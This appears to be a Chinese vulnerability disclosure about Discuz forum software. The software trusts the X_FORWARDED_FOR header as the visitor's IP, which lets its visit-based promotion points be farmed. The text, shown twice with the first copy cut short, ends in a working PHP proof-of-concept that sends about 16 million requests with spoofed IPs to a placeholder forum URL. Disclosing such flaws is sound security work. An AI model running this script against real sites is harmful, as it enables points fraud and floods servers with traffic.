### 简要描述: DZ的访问加分的推广功能存在缺陷 ### 详细说明: [<img src="https://images.seebug.org/upload/201309/101734447239d71dc43686ba230c139ea54bdc98.jpg" alt="dz.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/101734447239d71dc43686ba230c139ea54bdc98.jpg) 这里是定义IP的地方 [<img src="https://images.seebug.org/upload/201309/10173539b4e686648f36e40a550907ce5dc69e05.jpg" alt="dz1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/10173539b4e686648f36e40a550907ce5dc69e05.jpg) 当X_FORWARDED_FOR头存在并且不为那几种情况时使用这个作为IP地址 因为推广积分是跟访问IP有关的,所以只要修改X_FORWARDED_FOR就可以任意刷积分了 ### 漏洞证明: ``` <?php function inj($ip) { $optionget = stream_context_create(array('http' => array('method' => "GET",'ignore_errors'=>true, 'header' => "X_FORWARDED_FOR: $ip"))); $url = "http://www.xxx.com/forum.php?fromuid=3007"; $contents = file_get_contents($url,false,$optionget); return $contents; }...
### 简要描述: DZ的访问加分的推广功能存在缺陷 ### 详细说明: [<img src="https://images.seebug.org/upload/201309/101734447239d71dc43686ba230c139ea54bdc98.jpg" alt="dz.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/101734447239d71dc43686ba230c139ea54bdc98.jpg) 这里是定义IP的地方 [<img src="https://images.seebug.org/upload/201309/10173539b4e686648f36e40a550907ce5dc69e05.jpg" alt="dz1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/10173539b4e686648f36e40a550907ce5dc69e05.jpg) 当X_FORWARDED_FOR头存在并且不为那几种情况时使用这个作为IP地址 因为推广积分是跟访问IP有关的,所以只要修改X_FORWARDED_FOR就可以任意刷积分了 ### 漏洞证明: ``` <?php function inj($ip) { $optionget = stream_context_create(array('http' => array('method' => "GET",'ignore_errors'=>true, 'header' => "X_FORWARDED_FOR: $ip"))); $url = "http://www.xxx.com/forum.php?fromuid=3007"; $contents = file_get_contents($url,false,$optionget); return $contents; } for($i=0;$i<255;$i++)for($j=0;$j<255;$j++)for($k=0;$k<255;$k++)inj("111.$i.$j.$k"); ?> ```
